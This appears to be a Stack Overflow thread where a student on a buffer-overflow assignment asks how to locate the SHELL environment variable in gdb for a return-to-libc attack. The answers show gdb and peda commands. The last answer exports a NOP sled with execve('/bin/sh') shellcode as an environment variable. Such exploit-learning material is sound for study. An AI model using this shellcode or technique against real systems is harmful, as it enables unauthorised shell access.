16

I have to exploit a very simple buffer overflow in a vulnerable C++ program for an assignment and I am not being able to find the environment variable SHELL.

I have never worked with BoF before, and after reading lots of similar questions, posts, etc. I have this information (correct me if it's wrong):

  • The program stores the environment variables in a global variable called environ

  • I can find the address of this variable like this:

    (gdb) info variable environ All variables matching regular expression "environ": Non-debugging symbols: 0xb7fd1b00 __environ 0xb7fd1b00 _environ 0xb7fd1b00 environ

  • I need to find the /bin/bash string in that variable to launch a shell (I have already got the system and exit addresses, I only need the route to the shell). And here is where I don't know what to do. I have been reading gdb tutorials, but still nothing. x/s 0xb7fd1b00 does not output anything useful.

Improve this question

    4 Answers 4

    Reset to default
    23

    environ is a pointer to pointer, as it has the type char **environ.

    You have to try something like:

    (gdb) x/s *((char **)environ) 0xbffff688: "SSH_AGENT_PID=2107" (gdb) x/s *((char **)environ+1) 0xbffff69b: "SHELL=/bin/bash"
    Improve this answer
    3
    • That's it!! Thanks a lot :) I had managed to get the address just with x/s environ and TONS of "enter"s, but it wasn't very nice :P
      – Palantir
      CommentedMar 28, 2012 at 21:29
    • A lot easier to remember x/s *environ If you need to see multiple variables... x/5s *environ
      – user52132
      CommentedJul 17, 2014 at 2:47
    • I get "Cannot access memory at address ..." . Possible memory-read protection in RHEL 6 systems??
      – Otheus
      CommentedSep 5, 2015 at 21:40
    5
    • Environment variables are 16 bytes from the base pointer (%ebp).
    • Put a break point in the main function and do this,

    (gdb) x/wx $ebp+0x10
    0xffffd3f8: 0xffffd48c
    (gdb) x/wx 0xffffd48c
    0xffffd48c: 0xffffd67e
    (gdb) x/s 0xffffd67e
    0xffffd67e: "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0"
    (gdb) (gdb) x/wx 0xffffd48c+4
    0xffffd490: 0xffffd6b2
    (gdb) x/s 0xffffd6b2
    0xffffd6b2: "XDG_CONFIG_DIRS=/etc/xdg/lubuntu:/etc/xdg/xdg-Lubuntu:/usr/share/upstart/xdg:/etc/xdg"

    Refer this blog

    Improve this answer
      3

      if you have peda installed for gdb, then you could simply type this in gdb:

      gdb-peda$ searchmem SHELL

      The output would show

      Searching for 'SHELL' in: None ranges Found 1 results, display max 1 items: [stack] : 0xbffff540 ("SHELL=/bin/bash")
      Improve this answer
        0

        Also you can use just "refsearch variable_name" if you have peda installed for gdb.

        example:

        First of all you should add variable (something like Shellcode) to environment.

        (export Shellcode=$(python -c 'print "\x90"*100 +"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"'))

        Then open gdb with sample program, break main and run.

        When the program pause on the breakpoint, you can search the environment address following command.

        refsearch Shellcode

        Improve this answer

          You must log in to answer this question.

          Start asking to get answers

          Find the answer to your question by asking.

          Ask question

          Explore related questions

          See similar questions with these tags.